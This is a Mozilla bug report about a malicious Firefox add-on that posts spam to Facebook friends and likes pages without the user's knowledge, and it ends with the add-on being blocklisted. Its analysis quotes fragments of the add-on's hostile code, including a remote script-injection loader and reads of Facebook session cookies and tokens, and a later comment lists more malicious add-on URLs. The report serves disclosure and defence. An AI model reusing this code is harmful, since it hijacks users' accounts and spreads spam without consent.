Last Comment Bug 743484 - Malicious "Facebook Rosa" add-on
: Malicious "Facebook Rosa" add-on
Status: RESOLVED FIXED
:
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
:
: Jorge Villalobos [:jorgev]
Mentors:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2012-04-07 16:03 PDT by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
(edit)
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---


Attachments
20120407_rosathemenplus.zip (156.41 KB, application/octet-stream)
2012-04-07 16:03 PDT, MarkH
no flags Details

Description MarkH 2012-04-07 16:03:45 PDT
Created attachment 613147 [details]
20120407_rosathemenplus.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded add-on from http://rosathemenplus.com/plugin.xpi


Actual results:

Report for http://rosathemenplus.com/plugin.xpi

** Summary **

On install, it will begin programmatically sending spam to your Facebook friends and have you like pages, all without your knowledge or consent.

** Embedded and Remote Files **

lib.js
http://temasuperplugin.info?'+Math.random() <http://temasuperplugin.info/?'+Math.random()>
icon48.png
icon16.png
icon128.png
manifest.json


** Embedded Metadata **



** Files Loaded **



** Remote Javascript Loaded **

...(a=(b=document).createElement('script')).src='http://temasuperplugin.in <http://temasuperplugin.in/>
fo?'+Math...
"description": "Verwandeln Sie Ihr Facebook in rosa!",
"content_scripts": [


** Facebook Paths Accessed **

... F
m"}9(3.2.4("o.5/b/a/q.6")!=-1||3.2.4("/b/a/s.6")!=-1){m.3.2=\'7://f.5/t.6?g
\'...
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d =
'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d =
'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
"name": "Facebook: Rosa Themen-Plugin",
"description": "Verwandeln Sie Ihr Facebook in rosa!",


** Facebook Data Accessed **

var fb_dtsg = Env.fb_dtsg;
user_id = readCookie('c_user');
...d + '&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd' +
'&post_fo...
var fb_dtsg = Env.fb_dtsg;
..._widget' + '&nctr[_impid]=' + impid + '&fb_dtsg=' + fb_dtsg + '&lsd' +
'&post_fo...
user_id = readCookie('c_user');


** HTTP Requests **

var c = new XMLHttpRequest();
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
c['open']('POST', d, true);
var c = new XMLHttpRequest();
c['open']('POST', d, true);


** All URLs Loaded or Mentioned **

...var blog = "http://rosaausgabepro.com/farbe/" +
randomFromTo(8601,8800) + ".php"...
...c['open']('GET',
'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&...
var d =
'http://www.facebook.com/ajax/connect/external_edge_comment.php?__a=1';
var d =
'http://www.facebook.com/ajax/connect/external_node_connect.php?__a=1';
...document).createElement('script')).src='http://temasuperplugin.info?'+M <http://temasuperplugin.info/?'+M>
ath.rando...
"update_url": "http://rosaplugin.info/chrome.xml",




Expected results:

It should not post Facebook messages or like pages without your knowledge or consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-04-09 10:12:51 PDT
ID: pink@rosaplugin.info
Comment 2 Jorge Villalobos [:jorgev] 2012-04-09 10:14:13 PDT
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i84
Comment 3 admin 2012-04-24 05:43:15 PDT
hi can you ban this spammer addon too
http://faceeklenti.com/
http://faceeklenti.com/firefox.php
http://faceeklenti.com/eklenti/facebook.xpi

you may not access the website by having turkish ip address 

you can try access to site by http://www.gizlen.net/ a turkish web based proxy
Comment 4 Jorge Villalobos [:jorgev] 2012-04-25 16:23:14 PDT
Please read the blocklisting guidelines (https://wiki.mozilla.org/Blocklisting) and file a new blocklist bug if you think it matches our requisites.

Note You need to log in before you can comment on or make changes to this bug.